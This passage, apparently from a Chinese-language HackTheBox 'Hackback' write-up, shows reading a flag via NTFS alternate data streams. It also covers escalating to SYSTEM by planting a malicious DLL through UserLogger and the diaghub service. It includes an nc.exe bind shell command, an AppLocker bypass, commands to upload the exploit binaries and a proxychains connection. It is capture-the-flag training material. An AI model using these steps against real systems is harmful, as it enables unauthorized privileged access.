代码语言:javascript复制poweshell
copy c:usersadministratordesktoproot.txt .
cat root.txt
该文件不是我们想要的,应该需要使用ntfs数据流来进行读取
代码语言:javascript复制Get-Item c:usersadministratorroot.txt -force -stream *
cat c:usersadministratorroot.txt:flag.txt
成功获取第二个flag
恶意dll上线system
在2018年4月,Google的Project Zero发表文章,谈论 diaghub 服务可以指示 system32 以system身份从内部加载dll,那么当它加载时,不会检查文件的扩展名,所以只要写入一个 dll 到 system32 中,就可以要求 diaghub 加载它。鉴于此,我可以使用与 system 相同的路径,通过 userlogger 写入 system32,将恶意dll放入log文件中,然后调用 diaghub 来加载它。
exp源地址:https://github.com/decoder-it/diaghub_exploit
开始制作恶意 dll 文件,在此需要使用到 Visual Stdio,将上述文件夹打开并生成,选择JSK为10.0.17736.0
成功生成项目
在shell中将以下代码写入 mac.bat 中
代码语言:javascript复制C:Windowssystem32spooldriverscolornc.exe -l -p 5555 -e cmd.exe
在 FakeDLL.cpp 中修改命令代码为本地执行bat脚本路径
点击重新生成即可
同理在 diaghub_exploit.cpp 中修改执行的目录环境,用于绕过 AppLocker 应用策略
点击重新生成,然后在目录中找到 diaghub_exploit.exe 和 FakeDll.dll
把它们上传到C:Windowssystem32spooldriverscolor目录下
UPLOAD diaghub_exploit.exe C:Windowssystem32spooldriverscolormac.exe
UPLOAD FakeDll.dll C:Windowssystem32spooldriverscolorFakeDll.dll
进入 powershell 命令行开启 UserLogger,并将 FakeDll.dll 拷贝到C:windowssystem32目录下
cmd /c "sc.exe start userlogger C:windowssystem32mac"
copy C:Windowssystem32spooldriverscolorFakeDll.dll C:windowssystem32mac.log
但是显示进入失败,说明恶意dll文件未上传到C:windowssystem32目录下,查看 mac.log
ls c:windowssystem32 | findstr mac
在其中未直接生成log文件,观看 appsec 视频说是需要使用Invoke-Expression来完成写入
Invoke-Expression "sc.exe start UserLogger C:windowssystem32mac"
但是我还是没写入到C:windowssystem32目录中,原来是nc的运行位数搞错了,需要上传64位的nc
UPLOAD /root/hackthebox/Machines/Hackback/nc64.exe C:Windowssystem32spooldriverscolornc.exe
再次执行可以看到 mac.log
接下来就是将恶意dll程序复制到C:windowssystem32目录并重命名为mac.log,然后执行运行exp程序即可
copy C:Windowssystem32spooldriverscolorFakeDll.dll C:windowssystem32mac.log
C:Windowssystem32spooldriverscolormac.exe mac.log
查看本地端口开放情况,如果开放了5555端口那么说明exp利用成功
最后通过代理连接可获取到system
代码语言:javascript复制proxychains nc 10.10.10.128 5555
通过ntfs数据流获取flag
代码语言:javascript复制dir c:usersadministratorDesktop /a /r
cd c:usersadministratorDesktop
powershell -c Get-Content -stream root.txt:flag.txt
